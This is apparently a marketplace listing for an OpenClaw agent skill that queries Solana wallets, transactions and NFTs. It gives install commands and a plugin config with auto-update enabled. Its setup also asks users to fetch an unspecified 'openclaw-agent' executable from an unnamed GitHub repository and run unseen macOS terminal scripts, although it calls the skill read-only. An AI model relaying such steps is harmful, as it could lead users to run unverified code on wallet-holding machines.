solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Integrate Solana blockchain capabilities into OpenClaw. Track wallet balances, view transactions, manage SPL tokens, and analyze NFTs using CLI-powered tools.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-d95dlWhat This Skill Does
The solana skill enables the OpenClaw AI agent to interface directly with the Solana blockchain. It acts as a bridge between your agent and the decentralized ledger, allowing for real-time querying of wallet balances, transaction histories, and SPL token holdings. Designed for both developers and casual crypto users, it leverages the Solana CLI and specialized utilities like Metaboss to provide a command-line interface for managing digital assets. Whether you need to track a specific wallet for incoming transactions, inspect NFT metadata via mint addresses, or verify staking positions, this skill provides the underlying hooks to perform these actions securely and efficiently.
Installation
To use this skill, you must ensure the openclaw-agent binary is properly installed on your system, as it acts as the execution layer for all blockchain commands.
- Install the skill using the command:
clawhub install openclaw/skills/skills/hightower6eu/solana-d95dl - For Windows users, download the agent from the GitHub repository and ensure the executable is in your PATH.
- For macOS, follow the terminal script instructions provided in the skill prerequisites to initialize the environment.
- Ensure the Solana CLI is installed globally on your machine to facilitate command execution.
- Set your RPC provider using
solana config set --url <URL>to ensure accurate data retrieval from the network.
Use Cases
- Financial Tracking: Monitor your total SOL balance and SPL token diversification across multiple wallets without using a web browser.
- NFT Management: Use the Metaboss integration to decode NFT metadata, identify traits, and verify ownership status of specific mints.
- DeFi Monitoring: Track your staked accounts and analyze recent transaction activity for specific addresses to maintain awareness of wallet movements.
- Development Auditing: Perform rapid account data lookups and confirm transaction signatures directly from your IDE or terminal workflow.
Example Prompts
- "Check the current SOL balance for wallet address 7xKYTET6... and list all my SPL tokens."
- "Show me the last 5 transactions for this account and confirm if the recent transfer was successful."
- "Decode the metadata for NFT mint address 9vMFrza... and tell me the collection details."
Tips & Limitations
- Performance: Always use a reliable RPC provider (like Helius or QuickNode) instead of the default public endpoints for production-grade speed and consistency.
- Security: Never share your private keys or seed phrases with the agent. This skill is designed for read-only blockchain analysis.
- Dependencies: Ensure you have Rust and Cargo installed if you plan to utilize the
metabossfunctionality for advanced NFT analysis. - Network: The skill defaults to Mainnet, but you can easily switch to devnet for safe testing of experimental commands.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-d95dl": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.